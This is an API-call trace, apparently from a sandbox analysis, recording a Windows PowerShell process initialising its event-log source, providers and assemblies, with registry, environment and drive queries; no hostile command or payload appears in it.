	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.291] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x378) returned 0x0
	[0103.292] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.292] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x39c) returned 0x0
	[0103.292] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.292] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3a0) returned 0x0
	[0103.292] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.292] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3a4) returned 0x0
	[0103.292] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.292] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3a8) returned 0x0
	[0103.292] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.293] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3ac) returned 0x0
	[0103.293] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.293] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3b0) returned 0x0
	[0103.293] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.293] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3b4) returned 0x0
	[0103.293] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x0) returned 0x2
	[0103.293] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3b8) returned 0x0
	[0103.293] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed458 | out: phkResult=0xed458*=0x3bc) returned 0x0
	[0103.293] RegCloseKey (hKey=0x3bc) returned 0x0
	[0103.293] RegCloseKey (hKey=0x398) returned 0x0
	[0103.294] RegCloseKey (hKey=0x3b8) returned 0x0
	[0103.299] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b800008
	[0103.385] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c4c8f8*="WSMan", lpRawData=0x3c4c668) returned 1
	[0103.387] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.387] CoTaskMemFree (pv=0x28e290) 
	[0103.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.389] CoTaskMemAlloc (cb=0x804) returned 0x1b331790
	[0103.389] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b331790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.389] CoTaskMemFree (pv=0x1b331790) 
	[0103.389] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.389] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.390] CoTaskMemFree (pv=0x22b7e0) 
	[0103.390] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c51e30*="Alias", lpRawData=0x3c51bc0) returned 1
	[0103.391] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.391] CoTaskMemFree (pv=0x28e290) 
	[0103.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.394] CoTaskMemAlloc (cb=0x804) returned 0x1b331790
	[0103.394] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b331790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.394] CoTaskMemFree (pv=0x1b331790) 
	[0103.394] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.394] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.394] CoTaskMemFree (pv=0x22b7e0) 
	[0103.395] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c57428*="Environment", lpRawData=0x3c571b8) returned 1
	[0103.396] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.396] CoTaskMemFree (pv=0x28e290) 
	[0103.397] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.397] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0103.397] CoTaskMemFree (pv=0x28e290) 
	[0103.397] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.397] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0103.397] CoTaskMemFree (pv=0x28e290) 
	[0103.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xed290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0103.398] SetErrorMode (uMode=0x1) returned 0x1
	[0103.398] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xed4a0 | out: lpFileInformation=0xed4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0103.398] SetErrorMode (uMode=0x1) returned 0x1
	[0103.399] GetLogicalDrives () returned 0x4
	[0103.399] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xed000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0103.400] SetErrorMode (uMode=0x1) returned 0x1
	[0103.400] CoTaskMemAlloc (cb=0x68) returned 0x1b31bcf0
	[0103.400] CoTaskMemAlloc (cb=0x68) returned 0x1b31bd60
	[0103.400] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b31bcf0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xed470, lpMaximumComponentLength=0xed46c, lpFileSystemFlags=0xed468, lpFileSystemNameBuffer=0x1b31bd60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xed470*=0x9c354b42, lpMaximumComponentLength=0xed46c*=0xff, lpFileSystemFlags=0xed468*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0103.400] CoTaskMemFree (pv=0x1b31bcf0) 
	[0103.400] CoTaskMemFree (pv=0x1b31bd60) 
	[0103.400] SetErrorMode (uMode=0x1) returned 0x1
	[0103.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0103.401] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.401] SetErrorMode (uMode=0x1) returned 0x1
	[0103.401] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed410 | out: lpFileInformation=0xed410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0103.401] SetErrorMode (uMode=0x1) returned 0x1
	[0103.401] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.401] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xed060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0103.402] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.402] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0103.402] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.402] SetErrorMode (uMode=0x1) returned 0x1
	[0103.402] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed240 | out: lpFileInformation=0xed240*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0103.402] SetErrorMode (uMode=0x1) returned 0x1
	[0103.403] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.403] SetErrorMode (uMode=0x1) returned 0x1
	[0103.403] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed240 | out: lpFileInformation=0xed240*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0103.403] SetErrorMode (uMode=0x1) returned 0x1
	[0103.403] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0103.403] SetErrorMode (uMode=0x1) returned 0x1
	[0103.403] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed2e0 | out: lpFileInformation=0xed2e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0103.403] SetErrorMode (uMode=0x1) returned 0x1
	[0103.403] CoTaskMemAlloc (cb=0x804) returned 0x1b331790
	[0103.403] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b331790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.404] CoTaskMemFree (pv=0x1b331790) 
	[0103.404] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.404] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.404] CoTaskMemFree (pv=0x22b7e0) 
	[0103.404] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c5e518*="FileSystem", lpRawData=0x3c5e2a8) returned 1
	[0103.405] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.405] CoTaskMemFree (pv=0x28e290) 
	[0103.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.433] CoTaskMemAlloc (cb=0x804) returned 0x1b331790
	[0103.433] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b331790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.433] CoTaskMemFree (pv=0x1b331790) 
	[0103.433] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.433] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.433] CoTaskMemFree (pv=0x22b7e0) 
	[0103.434] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d8d7d8*="Function", lpRawData=0x2d8d568) returned 1
	[0103.438] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.438] CoTaskMemFree (pv=0x28e290) 
	[0103.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.604] CoTaskMemAlloc (cb=0x804) returned 0x1b332790
	[0103.604] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b332790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.695] CoTaskMemFree (pv=0x1b332790) 
	[0103.695] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.696] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.696] CoTaskMemFree (pv=0x22b7e0) 
	[0103.697] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbfbb0*="Registry", lpRawData=0x2dbf940) returned 1
	[0103.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.791] CoTaskMemAlloc (cb=0x804) returned 0x1b332790
	[0103.791] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b332790, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.791] CoTaskMemFree (pv=0x1b332790) 
	[0103.791] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.791] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.792] CoTaskMemFree (pv=0x22b7e0) 
	[0103.792] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc4fc8*="Variable", lpRawData=0x2dc4d58) returned 1
	[0103.793] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.793] CoTaskMemFree (pv=0x28e290) 
	[0103.796] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0103.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.796] CoTaskMemFree (pv=0x28e290) 
	[0103.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0103.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0103.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0103.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0103.997] CoTaskMemAlloc (cb=0x804) returned 0x1b33da00
